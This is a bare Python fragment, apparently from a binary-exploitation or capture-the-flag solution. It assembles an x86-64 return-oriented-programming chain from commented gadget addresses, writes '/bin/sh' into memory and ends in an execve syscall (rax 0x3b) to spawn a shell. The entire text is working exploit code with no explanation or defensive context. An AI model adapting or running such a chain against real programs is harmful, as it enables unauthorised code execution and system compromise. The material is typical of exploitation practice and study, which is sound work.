payload = p64(0x4cd3fe)
#0x00000000004cd3fe: pop rcx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x57340d)+p64(0x521d63)
# 0x0000000000521d63: pop rax; ret; 
payload += p64(0x4017d1)+p64(0x479106)
# 0x0000000000479106: lea r8, [rbp - 0x1320]; call rax; 
payload += b''
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x5071e2)
# 0x00000000005071e2: add qword ptr [r8 - 0x7d], rcx; ret; 
payload += p64(0x521d63)
# 0x0000000000521d63: pop rax; ret; 
payload += p64(0x0)+p64(0x4bec21)
# 0x00000000004bec21: xchg eax, edx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x572070)+p64(0x461681)
# 0x0000000000461681: pop rsi; ret; 
payload += p64(0x0)+p64(0x521d63)
# 0x0000000000521d63: pop rax; ret; 
payload += p64(0x3b)+p64(0x446d72)
# 0x0000000000446d72: syscall; 
payload += b''
